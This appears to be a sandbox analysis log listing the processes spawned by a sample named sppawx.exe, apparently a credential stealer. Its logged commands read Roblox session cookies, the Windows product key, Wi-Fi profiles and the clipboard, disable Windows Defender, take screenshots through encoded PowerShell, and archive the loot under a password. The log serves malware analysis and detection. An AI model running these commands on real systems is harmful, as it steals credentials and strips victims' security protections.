Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
